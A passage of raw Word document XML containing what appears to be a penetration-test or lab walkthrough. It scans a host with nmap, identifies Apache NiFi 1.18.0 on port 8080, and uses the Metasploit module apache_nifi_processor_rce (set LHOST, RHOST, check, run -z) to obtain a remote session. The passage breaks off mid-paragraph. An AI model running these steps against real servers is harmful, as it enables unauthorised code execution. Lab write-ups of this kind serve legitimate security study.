    </w:p>
    <w:p w14:paraId="2D2BBB92" w14:textId="465AF918" w:rsidR="00945A2F" w:rsidRDefault="00945A2F" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Started the enumeration with ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00945A2F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00945A2F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00945A2F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00945A2F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00945A2F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00945A2F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- 192.168.203.225</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’. As highlighted port </w:t>
      </w:r>
      <w:r w:rsidRPr="00945A2F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is running a web service named </w:t>
      </w:r>
      <w:r w:rsidRPr="00945A2F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Jetty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24410A11" w14:textId="77777777" w:rsidR="00945A2F" w:rsidRDefault="00945A2F" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC21CF7" w14:textId="48EDA300" w:rsidR="00945A2F" w:rsidRDefault="00945A2F" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F9321D9" wp14:editId="4A575DC6">
            <wp:extent cx="8229600" cy="3861435"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1454473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374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3861435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E50C9F" w14:textId="77777777" w:rsidR="00945A2F" w:rsidRDefault="00945A2F" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7D1885" w14:textId="77777777" w:rsidR="00945A2F" w:rsidRDefault="00945A2F" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03681511" w14:textId="77777777" w:rsidR="00945A2F" w:rsidRDefault="00945A2F" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFBB297" w14:textId="77777777" w:rsidR="00945A2F" w:rsidRDefault="00945A2F" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D93E20" w14:textId="77777777" w:rsidR="005A23B0" w:rsidRDefault="00945A2F" w:rsidP="004B7676">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005A23B0">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The web service ‘</w:t>
      </w:r>
      <w:r w:rsidR="005A23B0" w:rsidRPr="005A23B0">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.203.225:8080/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A23B0" w:rsidRPr="005A23B0">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A23B0">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="005A23B0">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD859B" w14:textId="24449FBA" w:rsidR="00945A2F" w:rsidRPr="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source data integration tool that provides an intuitive user interface to design data flows for moving, transforming, and processing data between various systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AE5F20" w14:textId="77777777" w:rsidR="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171404B8" w14:textId="551D09B6" w:rsidR="00945A2F" w:rsidRPr="0063180D" w:rsidRDefault="00945A2F" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="560A6029" wp14:editId="37E7954C">
            <wp:extent cx="8229600" cy="3843020"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="203382805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8057" name="Picture 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3843020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AED8939" w14:textId="75B62785" w:rsidR="00F94FC9" w:rsidRDefault="00F94FC9" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="440445F9" w14:textId="4DCD83EB" w:rsidR="005A23B0" w:rsidRPr="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The version running for Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.18.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774EAA7C" w14:textId="77777777" w:rsidR="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B22927" w14:textId="783B42F7" w:rsidR="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14850188" wp14:editId="5E608552">
            <wp:extent cx="8229600" cy="3848100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6425850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8501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3848100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6919B2" w14:textId="77777777" w:rsidR="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612E5779" w14:textId="77777777" w:rsidR="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFDBBD5" w14:textId="77777777" w:rsidR="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C14B351" w14:textId="77777777" w:rsidR="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E21C7B2" w14:textId="77777777" w:rsidR="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1F087C" w14:textId="096AC0C8" w:rsidR="005A23B0" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4</w:t>
      </w:r>
      <w:r>
        <w:t>: Verified Remote Code Execution against the version found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44351FD1" w14:textId="693688AE" w:rsidR="00B468AC" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="002D1C8E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/multi/http/apache_nifi_processor_rce/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="228A63FD" w14:textId="77777777" w:rsidR="005A23B0" w:rsidRDefault="005A23B0" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520D3CDF" w14:textId="384BFB7D" w:rsidR="005A23B0" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55FBB76F" wp14:editId="1E81387B">
            <wp:extent cx="8229600" cy="4053840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="7978476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7609"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4053840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="191FC30D" w14:textId="77777777" w:rsidR="00B468AC" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49199ADC" w14:textId="77777777" w:rsidR="00B468AC" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22BED1F3" w14:textId="77777777" w:rsidR="00B468AC" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37453A46" w14:textId="4C7B3A45" w:rsidR="00B468AC" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00741ED4" w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Metasploit module to exploit the </w:t>
      </w:r>
      <w:r w:rsidR="00B164E1">
        <w:t>vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771026E" w14:textId="089EF7C6" w:rsidR="00B468AC" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="002D1C8E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>https://labs.withsecure.com/tools/metasploit-modules-for-rce-in-apache-nifi-and-kong-api-gateway</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4345874F" w14:textId="77777777" w:rsidR="00B468AC" w:rsidRPr="00B468AC" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755764BD" w14:textId="6CD7C3A4" w:rsidR="00B468AC" w:rsidRDefault="00B468AC" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C794A43" wp14:editId="3A9919D8">
            <wp:extent cx="8229600" cy="3851275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20370996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99650"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851275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6BA5AE" w14:textId="77777777" w:rsidR="00741ED4" w:rsidRDefault="00741ED4" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45EA2811" w14:textId="77777777" w:rsidR="00741ED4" w:rsidRDefault="00741ED4" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE415C9" w14:textId="77777777" w:rsidR="00827E1E" w:rsidRDefault="00827E1E" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9BEAA2" w14:textId="5A6279B6" w:rsidR="00741ED4" w:rsidRDefault="00741ED4" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Follow the same commands as mentioned in the above snippet. The highlighted box shows an active session got after running commands in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00741ED4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341249E" w14:textId="216B1AC2" w:rsidR="005520A6" w:rsidRPr="00D513C1" w:rsidRDefault="00827E1E" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use/multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>apache_nifi_processor_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53539EB1" w14:textId="5C6EBC46" w:rsidR="00827E1E" w:rsidRPr="00D513C1" w:rsidRDefault="00827E1E" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set LHOST</w:t>
      </w:r>
      <w:r w:rsidR="007117FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;LOCAL IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, set target 1, set RHOST</w:t>
      </w:r>
      <w:r w:rsidR="007117FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;TARGET IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79440724" w14:textId="672D838E" w:rsidR="00827E1E" w:rsidRPr="00D513C1" w:rsidRDefault="00827E1E" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE5C74E" w14:textId="17F034CA" w:rsidR="00827E1E" w:rsidRPr="00D513C1" w:rsidRDefault="00827E1E" w:rsidP="002B529D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D513C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3330EEF2" w14:textId="73DE2585" w:rsidR="00741ED4" w:rsidRDefault="00741ED4" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C524C7D" wp14:editId="7E811F42">
            <wp:extent cx="8229600" cy="3860800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="3221901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90198"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860800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1EFE6" w14:textId="77777777" w:rsidR="00741ED4" w:rsidRDefault="00741ED4" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789132D6" w14:textId="77777777" w:rsidR="00741ED4" w:rsidRDefault="00741ED4" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1956A265" w14:textId="53FE8077" w:rsidR="00741ED4" w:rsidRPr="005520A6" w:rsidRDefault="005520A6" w:rsidP="002B529D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00561CC2">
        <w:rPr>
